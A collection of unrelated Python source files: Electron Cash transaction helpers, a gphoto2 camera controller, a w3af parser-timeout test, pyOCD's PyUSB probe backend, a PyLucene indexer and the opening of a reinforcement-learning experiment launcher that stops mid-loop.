# early abort from func, canceled
break
if r == 'block_height':
# ignore block_height reply from network.. was already processed in other thread in got_tx_info above
continue
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
for func in callback_funcs_to_cancel:
wallet.network.cancel_requests(func)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error(f"fetch_input_data: elapsed {(time.time()-t0):.4f} sec")
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
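    # Minimal usage sketch (the callbacks are hypothetical): start the fetch,
    # then read partial or complete results later via fetched_inputs():
    #
    #   started = tx.fetch_input_data(
    #       wallet,
    #       done_callback=refresh_dialog,            # runs in a non-main thread
    #       prog_callback=lambda pct: print_error('fetch progress', pct))
    #   if started:
    #       ...  # later, tx.fetched_inputs() has 'address'/'value' filled in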
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
        (the returned list will always have length len(self._inputs),
        with not-yet-downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
        # make sure to return a copy of the transaction from the cache
        # so that if the caller does .deserialize(), only *their* instance pays
        # the ~10x memory cost, and not the cached instance, which should
        # remain an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
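    # Note: both tx_cache_get and tx_cache_put intentionally deal in
    # *non-deserialized* copies -- tx_cache_get(txid) hands back
    # Transaction(tx.raw), so callers may .deserialize() freely without
    # bloating the shared cache.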
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
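# Accepted inputs for tx_from_str(), for illustration (hex shortened):
#   - raw hex string:  "0200000001...00000000"
#   - JSON wrapper:    '{"hex": "0200000001...00000000", "complete": true}'
# Either way, the raw hex string is returned.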
# ---
class OPReturn:
''' OPReturn helper namespace. Used by GUI main_window.py and also
electroncash/commands.py '''
class Error(Exception):
""" thrown when the OP_RETURN for a tx not of the right format """
class TooLarge(Error):
""" thrown when the OP_RETURN for a tx is >220 bytes """
@staticmethod
def output_for_stringdata(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
pushes = op_return.split('<push>')
script = "OP_RETURN"
for data in pushes:
if data.startswith("<hex>"):
data = data.replace("<hex>", "")
elif data.startswith("<empty>"):
pass
else:
data = data.encode('utf-8').hex()
script = script + " " + data
scriptBuffer = ScriptOutput.from_string(script)
if len(scriptBuffer.script) > 223:
raise OPReturn.TooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
amount = 0
return (TYPE_SCRIPT, scriptBuffer, amount)
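    # Illustration of the <push> mini-language handled above (values are
    # hypothetical):
    #   "hello<push><hex>deadbeef" -> OP_RETURN <push utf-8 "hello"> <push 0xdeadbeef>
    #   "<empty>"                  -> OP_RETURN with a single empty push
    # The assembled script (OP_RETURN opcode included) must stay <= 223 bytes.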
@staticmethod
def output_for_rawhex(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturn.Error(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturn.TooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput.protocol_factory(op_return_script), amount)
# /OPReturn
|
camera.py
|
import gphoto2 as gp
import threading
import os
from os import listdir
from os.path import isfile, join
class CameraController:
def __init__(self, mypath):
print('init')
self._dir = mypath
self.pictures = sorted([os.path.join(mypath, f) for f in listdir(mypath) if isfile(join(mypath, f))])
    def get_picture(self):
        # Wait for any previous capture to finish before starting a new one.
        # Note: keep the Thread object itself; Thread.start() returns None.
        if getattr(self, 'capture_thread', None) is not None:
            self.capture_thread.join()
        self.capture_thread = threading.Thread(target=self._get_picture)
        self.capture_thread.start()
def _get_picture(self):
print('get picture')
camera = gp.check_result(gp.gp_camera_new())
gp.check_result(gp.gp_camera_init(camera))
print('Capturing image')
file_path = gp.check_result(gp.gp_camera_capture(
camera, gp.GP_CAPTURE_IMAGE))
print('Camera file path: {0}/{1}'.format(file_path.folder, file_path.name))
target = os.path.join(self._dir, file_path.name)
self.pictures.append(target)
print('Copying image to', target)
camera_file = gp.check_result(gp.gp_camera_file_get(
camera, file_path.folder, file_path.name, gp.GP_FILE_TYPE_NORMAL))
gp.check_result(gp.gp_file_save(camera_file, target))
gp.check_result(gp.gp_camera_exit(camera))
    def wait_for_camera(self):
        # Block until the background capture thread (if any) has finished.
        if getattr(self, 'capture_thread', None) is not None:
            self.capture_thread.join()
def get_preview(self):
print('get preview')
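# Minimal usage sketch (the directory path is hypothetical):
#
#   controller = CameraController('/tmp/photobooth')
#   controller.get_picture()      # capture runs on a background thread
#   controller.wait_for_camera()  # block until the image has been saved
#   print(controller.pictures[-1])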
|
test_mp_document_parser.py
|
"""
test_mp_document_parser.py
Copyright 2015 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
import time
import random
import unittest
import multiprocessing
from mock import patch, PropertyMock
from nose.plugins.skip import SkipTest
from concurrent.futures import TimeoutError
from w3af import ROOT_PATH
from w3af.core.data.parsers.doc.sgml import Tag
from w3af.core.data.parsers.mp_document_parser import MultiProcessingDocumentParser
from w3af.core.data.parsers.doc.url import URL
from w3af.core.data.url.HTTPResponse import HTTPResponse
from w3af.core.data.dc.headers import Headers
from w3af.core.data.parsers.doc.html import HTMLParser
from w3af.core.data.parsers.tests.test_document_parser import _build_http_response
class TestMPDocumentParser(unittest.TestCase):
def setUp(self):
self.url = URL('http://w3af.com')
self.headers = Headers([(u'content-type', u'text/html')])
self.mpdoc = MultiProcessingDocumentParser()
def tearDown(self):
self.mpdoc.stop_workers()
def test_basic(self):
resp = HTTPResponse(200, '<a href="/abc">hello</a>',
self.headers, self.url, self.url)
parser = self.mpdoc.get_document_parser_for(resp)
parsed_refs, _ = parser.get_references()
self.assertEqual([URL('http://w3af.com/abc')], parsed_refs)
def test_no_parser_for_images(self):
body = ''
url = URL('http://w3af.com/foo.jpg')
headers = Headers([(u'content-type', u'image/jpeg')])
resp = HTTPResponse(200, body, headers, url, url)
try:
self.mpdoc.get_document_parser_for(resp)
except Exception, e:
self.assertEqual(str(e), 'There is no parser for images.')
else:
self.assertTrue(False, 'Expected exception!')
def test_parser_timeout(self):
"""
Test to verify fix for https://github.com/andresriancho/w3af/issues/6723
"w3af running long time more than 24h"
"""
mmpdp = 'w3af.core.data.parsers.mp_document_parser.%s'
kmpdp = mmpdp % 'MultiProcessingDocumentParser.%s'
modp = 'w3af.core.data.parsers.document_parser.%s'
with patch(mmpdp % 'om.out') as om_mock,\
patch(kmpdp % 'PARSER_TIMEOUT', new_callable=PropertyMock) as timeout_mock,\
patch(kmpdp % 'MAX_WORKERS', new_callable=PropertyMock) as max_workers_mock,\
patch(modp % 'DocumentParser.PARSERS', new_callable=PropertyMock) as parsers_mock:
#
# Test the timeout
#
html = '<html>DelayedParser!</html>'
http_resp = _build_http_response(html, u'text/html')
timeout_mock.return_value = 1
max_workers_mock.return_value = 1
parsers_mock.return_value = [DelayedParser, HTMLParser]
try:
self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertTrue(False)
#
# We now want to make sure that after we kill the process the Pool
# creates a new process for handling our tasks
#
# https://github.com/andresriancho/w3af/issues/9713
#
html = '<html>foo-</html>'
http_resp = _build_http_response(html, u'text/html')
doc_parser = self.mpdoc.get_document_parser_for(http_resp)
self.assertIsInstance(doc_parser._parser, HTMLParser)
def test_many_parsers_timing_out(self):
"""
        Received more reports of parsers timing out, and after that
        w3af always showing "The parser took more than X seconds to complete
        parsing of" for all calls to the parser.
        We want to test how well the parser recovers from many timeouts.
"""
mmpdp = 'w3af.core.data.parsers.mp_document_parser.%s'
kmpdp = mmpdp % 'MultiProcessingDocumentParser.%s'
modp = 'w3af.core.data.parsers.document_parser.%s'
with patch(mmpdp % 'om.out') as om_mock,\
patch(kmpdp % 'PARSER_TIMEOUT', new_callable=PropertyMock) as timeout_mock,\
patch(kmpdp % 'MAX_WORKERS', new_callable=PropertyMock) as max_workers_mock,\
patch(modp % 'DocumentParser.PARSERS', new_callable=PropertyMock) as parsers_mock:
# Prepare the HTTP responses
html_trigger_delay = '<html>DelayedParser!</html>%s'
html_ok = '<html>foo-</html>%s'
# Mocks
timeout_mock.return_value = 1
max_workers_mock.return_value = 5
parsers_mock.return_value = [DelayedParser, HTMLParser]
ITERATIONS = 25
#
# Lets timeout many sequentially
#
for i in xrange(ITERATIONS):
http_resp = _build_http_response(html_trigger_delay % i, u'text/html')
try:
self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertTrue(False)
#
# Lets timeout randomly
#
for i in xrange(ITERATIONS):
html = random.choice([html_trigger_delay, html_ok])
http_resp = _build_http_response(html % i, u'text/html')
try:
parser = self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertIsInstance(parser._parser, HTMLParser)
#
# Lets parse things we know should work
#
for i in xrange(ITERATIONS):
http_resp = _build_http_response(html_ok % i, u'text/html')
parser = self.mpdoc.get_document_parser_for(http_resp)
self.assertIsInstance(parser._parser, HTMLParser)
def test_parser_with_large_attr_killed_when_sending_to_queue(self):
"""
https://docs.python.org/2/library/multiprocessing.html
Warning If a process is killed using Process.terminate()
or os.kill() while it is trying to use a Queue, then the
data in the queue is likely to become corrupted. This may
cause any other process to get an exception when it tries
to use the queue later on.
Try to kill the process while it is sending data to the queue
"""
raise SkipTest('This test breaks the build because it uses A LOT'
' of memory, for more information take a look at'
' https://circleci.com/gh/andresriancho/w3af/2819 .'
' Note that there is no memory leak here, just a'
' test which is designed to use a lot of memory'
' to force a specific state.')
mmpdp = 'w3af.core.data.parsers.mp_document_parser.%s'
kmpdp = mmpdp % 'MultiProcessingDocumentParser.%s'
modp = 'w3af.core.data.parsers.document_parser.%s'
with patch(mmpdp % 'om.out') as om_mock,\
patch(kmpdp % 'PARSER_TIMEOUT', new_callable=PropertyMock) as timeout_mock,\
patch(kmpdp % 'MAX_WORKERS', new_callable=PropertyMock) as max_workers_mock,\
patch(modp % 'DocumentParser.PARSERS', new_callable=PropertyMock) as parsers_mock:
# Prepare the HTTP responses
html_trigger_delay = '<html>HugeClassAttrValueParser!</html>%s'
html_ok = '<html>foo-</html>%s'
# Mocks
timeout_mock.return_value = 1
max_workers_mock.return_value = 5
parsers_mock.return_value = [HugeClassAttrValueParser, HTMLParser]
ITERATIONS = 10
#
# Lets timeout many sequentially
#
for i in xrange(ITERATIONS):
http_resp = _build_http_response(html_trigger_delay % i, u'text/html')
try:
self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertTrue(False)
#
# Lets timeout randomly
#
for i in xrange(ITERATIONS):
html = random.choice([html_trigger_delay, html_ok])
http_resp = _build_http_response(html % i, u'text/html')
try:
parser = self.mpdoc.get_document_parser_for(http_resp)
except TimeoutError, toe:
self._is_timeout_exception_message(toe, om_mock, http_resp)
else:
self.assertIsInstance(parser._parser, HTMLParser)
#
# Lets parse things we know should work
#
for i in xrange(ITERATIONS):
http_resp = _build_http_response(html_ok % i, u'text/html')
parser = self.mpdoc.get_document_parser_for(http_resp)
self.assertIsInstance(parser._parser, HTMLParser)
def test_parser_memory_usage_exceeded(self):
"""
This makes sure that we stop parsing a document that exceeds our memory
usage limits.
"""
mmpdp = 'w3af.core.data.parsers.mp_document_parser.%s'
kmpdp = mmpdp % 'MultiProcessingDocumentParser.%s'
modp = 'w3af.core.data.parsers.document_parser.%s'
with patch(mmpdp % 'om.out') as om_mock,\
patch(kmpdp % 'MEMORY_LIMIT', new_callable=PropertyMock) as memory_mock,\
patch(kmpdp % 'MAX_WORKERS', new_callable=PropertyMock) as max_workers_mock,\
patch(modp % 'DocumentParser.PARSERS', new_callable=PropertyMock) as parsers_mock:
#
# Test the memory usage
#
html = '<html>UseMemoryParser!</html>'
http_resp = _build_http_response(html, u'text/html')
memory_mock.return_value = 150000
max_workers_mock.return_value = 1
parsers_mock.return_value = [UseMemoryParser, HTMLParser]
try:
self.mpdoc.get_document_parser_for(http_resp)
except MemoryError, me:
self.assertIn('OOM issues', str(me))
else:
self.assertTrue(False)
#
# We now want to make sure that after we stop because of a memory issue
# the process the Pool continues handling tasks as expected
#
html = '<html>foo-</html>'
http_resp = _build_http_response(html, u'text/html')
doc_parser = self.mpdoc.get_document_parser_for(http_resp)
self.assertIsInstance(doc_parser._parser, HTMLParser)
def _is_timeout_exception_message(self, toe, om_mock, http_resp):
msg = ('[timeout] The parser took more than %s seconds to '
'complete parsing of "%s", killed it!')
error = msg % (MultiProcessingDocumentParser.PARSER_TIMEOUT,
http_resp.get_url())
self.assertEquals(str(toe), error)
def test_daemon_child(self):
"""
Reproduces:
A "AssertionError" exception was found while running
crawl.web_spider on "Method: GET | http://domain:8000/". The
exception was: "daemonic processes are not allowed to have children"
at process.py:start():124. The scan will continue but some
vulnerabilities might not be identified.
"""
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=daemon_child, args=(queue,))
p.daemon = True
p.start()
p.join()
got_assertion_error = queue.get(timeout=10)
if got_assertion_error:
self.assertTrue(False, 'daemonic processes are not allowed'
' to have children')
def test_non_daemon_child_ok(self):
"""
Making sure that the previous failure is due to "p.daemon = True"
"""
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=daemon_child, args=(queue,))
# This is where we change stuff:
#p.daemon = True
p.start()
p.join()
got_assertion_error = queue.get(timeout=10)
if got_assertion_error:
self.assertTrue(False, 'daemonic processes are not allowed'
' to have children')
def test_dictproxy_pickle_8748(self):
"""
MaybeEncodingError - PicklingError: Can't pickle dictproxy #8748
https://github.com/andresriancho/w3af/issues/8748
"""
        html_body = os.path.join(ROOT_PATH, 'core/data/parsers/tests/data/',
                                 'pickle-8748.htm')
url = URL('http://www.ensinosuperior.org.br/asesi.htm')
resp = HTTPResponse(200, html_body, self.headers, url, url)
parser = self.mpdoc.get_document_parser_for(resp)
self.assertIsInstance(parser._parser, HTMLParser)
def test_get_tags_by_filter(self):
body = '<html><a href="/abc">foo</a><b>bar</b></html>'
url = URL('http://www.w3af.com/')
headers = Headers()
headers['content-type'] = 'text/html'
resp = HTTPResponse(200, body, headers, url, url, charset='utf-8')
tags = self.mpdoc.get_tags_by_filter(resp, ('a', 'b'), yield_text=True)
self.assertEqual([Tag('a', {'href': '/abc'}, 'foo'),
Tag('b', {}, 'bar')], tags)
def test_get_tags_by_filter_empty_tag(self):
body = '<html><script src="foo.js"></script></html>'
url = URL('http://www.w3af.com/')
headers = Headers()
headers['content-type'] = 'text/html'
resp = HTTPResponse(200, body, headers, url, url, charset='utf-8')
tags = self.mpdoc.get_tags_by_filter(resp, ('script',), yield_text=True)
# Note that lxml returns None for this tag text:
self.assertEqual([Tag('script', {'src': 'foo.js'}, None)], tags)
def daemon_child(queue):
dpc = MultiProcessingDocumentParser()
try:
dpc.start_workers()
except AssertionError:
queue.put(True)
else:
queue.put(False)
class DelayedParser(object):
def __init__(self, http_response):
self.http_response = http_response
@staticmethod
def can_parse(http_response):
return 'DelayedParser' in http_response.get_body()
def parse(self):
time.sleep(3)
def clear(self):
return True
class UseMemoryParser(object):
def __init__(self, http_response):
self.http_response = http_response
@staticmethod
def can_parse(http_response):
return 'UseMemoryParser' in http_response.get_body()
def parse(self):
memory_user = ''
for _ in xrange(1000000):
memory_user += 'A' * 256
def clear(self):
return True
class HugeClassAttrValueParser(object):
parse_was_called = False
def __init__(self, http_response):
self.data_to_make_queue_busy = None
self.http_response = http_response
@staticmethod
def can_parse(http_response):
return 'HugeClassAttrValueParser' in http_response.get_body()
def parse(self):
self.data_to_make_queue_busy = 'A' * (2 ** 30)
self.parse_was_called = True
def clear(self):
return True
|
pyusb_backend.py
|
# pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .interface import Interface
from .common import (filter_device_by_class, is_known_cmsis_dap_vid_pid)
from ..dap_access_api import DAPAccessIntf
import logging
import os
import threading
import six
from time import sleep
import platform
import errno
log = logging.getLogger('pyusb')
try:
import usb.core
import usb.util
except:
if os.name == "posix" and not os.uname()[0] == 'Darwin':
log.error("PyUSB is required on a Linux Machine")
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
class PyUSB(Interface):
"""
This class provides basic functions to access
a USB HID device using pyusb:
- write/read an endpoint
"""
isAvailable = IS_AVAILABLE
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 64
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=FindDap(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get hid interface
interface = None
interface_number = None
for interface in config:
if interface.bInterfaceClass == 0x03:
interface_number = interface.bInterfaceNumber
break
if interface_number is None or interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no hid interface" %
self.serial_number)
# Find endpoints
ep_in, ep_out = None, None
for endpoint in interface:
if endpoint.bEndpointAddress & 0x80:
ep_in = endpoint
else:
ep_out = endpoint
# If there is no EP for OUT then we can use CTRL EP.
# The IN EP is required
if not ep_in:
raise DAPAccessIntf.DeviceError("Unable to open device -"
" no endpoints")
# Detach kernel driver
kernel_driver_was_attached = False
try:
if dev.is_kernel_driver_active(interface_number):
dev.detach_kernel_driver(interface_number)
kernel_driver_was_attached = True
except NotImplementedError as e:
            # Some implementations don't have kernel attach/detach
log.debug('Exception detaching kernel driver: %s' %
str(e))
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.dev = dev
self.intf_number = interface_number
self.kernel_driver_was_attached = kernel_driver_was_attached
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
try:
while not self.closed:
self.read_sem.acquire()
if not self.closed:
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""
        returns all the connected devices which match PyUSB.vid/PyUSB.pid.
returns an array of PyUSB (Interface) objects
"""
# find all cmsis-dap devices
all_devices = usb.core.find(find_all=True, custom_match=FindDap())
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSB()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
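    # Usage sketch:
    #
    #   interfaces = PyUSB.get_all_connected_interfaces()
    #   for iface in interfaces:
    #       print(iface.vendor_name, iface.product_name, iface.serial_number)
    #   if interfaces:
    #       probe = interfaces[0]
    #       probe.open()   # claims the HID interface and starts the RX thread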
def write(self, data):
"""
write data on the OUT endpoint associated to the HID interface
"""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
bmRequestType = 0x21 #Host to device request of type Class of Recipient Interface
bmRequest = 0x09 #Set_REPORT (HID class-specific request for transferring data over EP0)
wValue = 0x200 #Issuing an OUT report
wIndex = self.intf_number #mBed Board interface number for HID
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
#raise ValueError('EP_OUT endpoint is NULL')
self.ep_out.write(data)
#logging.debug('sent: %s', data)
return
def read(self):
"""
read data on the IN endpoint associated to the HID interface
"""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited" %
self.serial_number)
return self.rcv_data.pop(0)
def set_packet_count(self, count):
# No interface level restrictions on count
self.packet_count = count
def set_packet_size(self, size):
self.packet_size = size
def get_serial_number(self):
return self.serial_number
def close(self):
"""
close the interface
"""
assert self.closed is False
log.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
usb.util.release_interface(self.dev, self.intf_number)
if self.kernel_driver_was_attached:
try:
self.dev.attach_kernel_driver(self.intf_number)
except Exception as exception:
log.warning('Exception attaching kernel driver: %s',
str(exception))
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.kernel_driver_was_attached = False
self.thread = None
class FindDap(object):
"""CMSIS-DAP match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""Return True if this is a DAP device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
# First attempt to get the active config. This produces a more direct error
# when you don't have device permissions on Linux
dev.get_active_configuration()
# Now read the product name string.
device_string = dev.product
except usb.core.USBError as error:
if error.errno == errno.EACCES and platform.system() == "Linux":
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
log.warning(msg)
else:
log.debug(msg)
else:
log.debug("Error accessing USB device (VID=%04x PID=%04x): %s",
dev.idVendor, dev.idProduct, error)
return False
except (IndexError, NotImplementedError) as error:
log.debug("Error accessing USB device (VID=%04x PID=%04x): %s", dev.idVendor, dev.idProduct, error)
return False
if device_string is None:
return False
if device_string.find("CMSIS-DAP") < 0:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
IndexFiles.py
|
#!/usr/bin/env python
INDEX_DIR = "IndexFiles.index"
import sys
import os
import lucene
import threading
import time
import jieba
from datetime import datetime
from bs4 import BeautifulSoup
from java.nio.file import Paths
from org.apache.lucene.analysis.miscellaneous import LimitTokenCountAnalyzer
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import \
FieldInfo, IndexWriter, IndexWriterConfig, IndexOptions
from org.apache.lucene.store import SimpleFSDirectory
"""
This class is loosely based on the Lucene (java implementation) demo class
org.apache.lucene.demo.IndexFiles. It will take a directory as an argument
and will index all of the files in that directory and downward recursively.
It will index on the file path, the file name and the file contents. The
resulting Lucene index will be placed in the current directory and called
'index'.
"""
class Ticker(object):
def __init__(self):
self.tick = True
def run(self):
while self.tick:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(1.0)
class IndexFiles(object):
"""Usage: python IndexFiles <doc_directory>"""
def __init__(self, root, storeDir, analyzer):
if not os.path.exists(storeDir):
os.mkdir(storeDir)
store = SimpleFSDirectory(Paths.get(storeDir))
analyzer = LimitTokenCountAnalyzer(analyzer, 1048576)
config = IndexWriterConfig(analyzer)
config.setOpenMode(IndexWriterConfig.OpenMode.CREATE)
writer = IndexWriter(store, config)
self.indexDocs(root, writer)
ticker = Ticker()
print('commit index')
threading.Thread(target=ticker.run).start()
writer.commit()
writer.close()
ticker.tick = False
print('done')
def indexDocs(self, root, writer):
t1 = FieldType()
t1.setStored(True)
t1.setTokenized(False)
t1.setIndexOptions(IndexOptions.DOCS_AND_FREQS)
t2 = FieldType()
t2.setStored(False)
t2.setTokenized(True)
t2.setIndexOptions(IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)
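        # t1: stored but not tokenized -- used for fields returned verbatim with
        # each hit (url, path, name, title). t2: tokenized but not stored -- the
        # searchable body text, kept out of the stored fields to keep the index
        # small.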
with open(os.path.join(root, "index.txt"), mode="r", encoding="utf8") as index:
for line in index:
try:
url, path = line.strip().split("\t")
path = os.path.join("./", path)
print("Adding {url},{path}".format(url=url, path=path))
name = os.path.split(path)[-1]
with open(path, mode="r", encoding="utf8") as file:
content = file.read()
soup = BeautifulSoup(content, "html.parser")
# print(soup.title)
title = soup.title.text if soup.title else "No Title!"
content = "".join(soup.findAll(text=True)) # all html tags stripped
content = " ".join(jieba.cut(content))
doc = Document()
doc.add(Field("url", url, t1))
doc.add(Field("path", path, t1))
doc.add(Field("name", name, t1))
doc.add(Field("title", title, t1))
doc.add(Field("content", content, t2))
writer.addDocument(doc)
except Exception as e:
print("Failed in indexDocs:", e)
if __name__ == '__main__':
if len(sys.argv) < 2:
print(IndexFiles.__doc__)
sys.exit(1)
lucene.initVM(vmargs=['-Djava.awt.headless=true'])
print('lucene', lucene.VERSION)
start = datetime.now()
try:
base_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
IndexFiles(sys.argv[1], os.path.join(base_dir, INDEX_DIR),
StandardAnalyzer())
end = datetime.now()
print(end - start)
except Exception as e:
print("Failed: ", e)
raise e
|
walker2d-v2.py
|
import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--pgmorl', default=False, action='store_true')
parser.add_argument('--ra', default=False, action='store_true')
parser.add_argument('--pfa', default=False, action='store_true')
parser.add_argument('--moead', default=False, action='store_true')
parser.add_argument('--random', default=False, action='store_true')
parser.add_argument('--num-seeds', type=int, default=6)
parser.add_argument('--num-processes',
type=int,
default=1,
help='number of algorithms to be run in parallel (Note: each algorithm needs 4 * num-tasks processors by default, so the total number of processors is 4 * num-tasks * num-processes.)')
parser.add_argument('--save-dir', type=str, default='./results/Walker-v2')
args = parser.parse_args()
random.seed(1000)
commands = []
save_dir = args.save_dir
test_pgmorl = args.pgmorl
test_ra = args.ra
test_random = args.random
test_pfa = args.pfa
test_moead = args.moead
for i in range(args.num_seeds):
